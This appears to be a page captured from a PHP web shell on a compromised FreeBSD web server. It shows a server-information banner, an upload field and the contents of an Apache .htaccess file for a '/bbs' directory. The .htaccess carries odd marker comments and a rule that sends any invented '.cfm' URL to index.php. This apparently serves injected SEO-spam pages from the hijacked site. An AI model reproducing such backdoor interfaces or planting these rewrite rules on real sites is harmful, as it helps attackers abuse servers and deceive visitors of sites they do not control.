|
Server : Apache/2.4.62 System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64 User : www ( 80) PHP Version : 8.3.8 Disable Function : NONE Directory : /domains/betterpi/bbs/ |
Upload File : |
###############################################################################
# Common directives
###############################################################################
# NOTE: Replace /bbs/ with the relative web path of your catalog in the "Rewrite Base" line below:
Options +FollowSymLinks
RewriteEngine on
#mulubg
RewriteBase /bbs
#muluend
# Don't rewrite real files or directories
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#houzui
RewriteRule ^(.*)\.cfm$ index\.php?id=$1&%{QUERY_STRING} [L]